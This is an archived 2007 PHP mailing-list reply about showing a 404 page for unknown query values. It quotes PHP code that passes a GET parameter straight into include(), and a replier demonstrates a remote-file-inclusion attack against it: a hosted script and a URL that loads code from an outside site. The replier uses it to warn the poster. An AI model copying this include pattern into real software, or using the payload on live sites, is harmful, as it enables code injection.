Re: [PHP] simple page not found 404 script - PHP
- From: dwayne@xxxxxxxxxxxxxxx ("Dwayne Heronimo")
- Date: Fri, 30 Mar 2007 18:42:54 +0200
Yes but this file does not exist. It is just to use for my queries. so I
think I cannot use the file_exists function. Which other function I would
use to do this?
I already have setup the .htaccess file to point also to a 404 page. but
this works only if the URL is totally wrong. like www.arubaguide.org/blabla
but not www.arubaguide.org/categories.php?catcode=blabla
"Davi" <davividal@xxxxxxxxxxxxxxxx> wrote in message
news:200703301324.01518.davividal@xxxxxxxxxxxxxxxxxxx
Em Sexta 30 Março 2007 13:17, Dwayne Heronimo escreveu:
where getting there .. now i have this.. but now it will only show the 404
page. I think somehow that the firstpart is not working? the include part?
http://arubaguide.org/arubaguide/categories.php?catcode=activities
<?php require_once('../Connections/arubaguide.php'); ?>
<?php
$cat_item = $_GET['catcode'];
if(file_exists($cat_item)) {
include "$cat_item";
}
else {
include "404.php";
exit;
}
include exploit:
arq_inc.htm:
<script>
window.location="www.mypage.com";
</script>
then:
www.yourpage.com/script.php?catcode=http://www.mypage.com/arc_inc.htm
o/
--
Davi Vidal
davividal@xxxxxxxxxxxxxxxx
davividal@xxxxxxxxx
--
Agora com fortune:
""The government is not the surplus's money, Vice President."
George W. Bush
November 5, 2000
From The Washington Post.".
- Follow-Ups:
- References:
- simple page not found 404 script - PHP
- From: "Dwayne Heronimo"
- Re: [PHP] simple page not found 404 script - PHP
- From: Zoltán Németh
- Re: [PHP] simple page not found 404 script - PHP
- From: "Dwayne Heronimo"
- Re: [PHP] simple page not found 404 script - PHP
- From: Davi
- simple page not found 404 script - PHP
- Prev by Date: Re: [PHP] Gnome and MIME types
- Next by Date: Re: [PHP] simple page not found 404 script - PHP
- Previous by thread: Re: [PHP] simple page not found 404 script - PHP
- Next by thread: Re: [PHP] simple page not found 404 script - PHP
- Index(es):
Relevant Pages
|